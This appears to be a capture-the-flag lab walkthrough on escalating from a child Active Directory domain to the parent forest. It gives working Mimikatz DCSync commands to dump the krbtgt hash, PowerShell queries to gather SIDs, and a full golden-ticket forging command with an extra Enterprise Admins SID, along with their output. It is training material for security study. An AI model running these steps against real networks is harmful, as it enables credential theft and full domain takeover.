Exploiting domain trusts

A forest, in Active Directory terms, consists of domain trees. Trusts define how domains in a forest can talk to one another. The main types of trusts are:

• Directional: Trust flows from one domain to another trusted domain

• Transitive: Trust flows between multiple trusted domains

KRBTGT and Golden tickets

If an attacker compromises a domain controller and achieves full SYSTEM rights, it is possible to extract the hash of the krbtgt account. This would allow the attacker to create TGS tickets for any resources they choose.

In order to create golden tickets, the following must be known:

• FQDN of the domain

• SID of the domain

• Username to impersonate

• KRBTGT hash

The first three are usually easy to recover. The last one requires a domain compromise since the KRBTGT password hash is only stored on domain controllers.

Dumping the KRBTGT hash

Use the RDP session on THMSERVER2 to recover the KRBTGT password hash using Mimikatz with DC Sync:

C:\Tools>mimikatz_trunk\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::dcsync /user:za\krbtgt
[DC] 'za.tryhackme.loc' will be the domain
[DC] 'THMDC.za.tryhackme.loc' will be the DC server
[DC] 'za\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 4/25/2022 7:18:22 PM
Object Security ID   : S-1-5-21-3885271727-2693558621-2658995185-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: removed
    ntlm- 0: removed
    lm  - 0: removed
...

Getting the SIDs

Recover two SIDs:

• The SID of the child domain controller (THMDC), to be impersonated in the forged TGT

• The SID of the Enterprise Admins in the parent domain, to be added as an extra SID to the forged TGT

Use the AD-RSAT Powershell cmdlets to recover the SID of the child domain controller:

PS C:\> Get-ADComputer -Identity "THMDC"

DistinguishedName : CN=THMDC,OU=Domain Controllers,DC=za,DC=tryhackme,DC=loc
DNSHostName       : THMDC.za.tryhackme.loc
Enabled           : True
Name              : THMDC
ObjectClass       : computer
ObjectGUID        : bd651750-782b-4b09-93b4-b5987ec7311b
SamAccountName    : THMDC$
SID               : S-1-5-21-3885271727-2693558621-2658995185-1001
UserPrincipalName :

Recover the SID of the Enterprise Admins group by querying the parent domain controller:

PS C:\> Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.tryhackme.loc

DistinguishedName : CN=Enterprise Admins,CN=Users,DC=tryhackme,DC=loc
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : a23ae384-16e8-44d5-9b36-8173c4e0e5de
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-3330634377-removed-519

Exploiting domain trusts

Use Mimikatz to generate a golden ticket.

mimikatz # kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt

Try browsing the remote file system of \\thmrootdc.tryhackme.loc\C$ (the UNC path to the C$ share). The flag is on THMROOTDC in the Administrator’s Desktop folder (flag6.txt).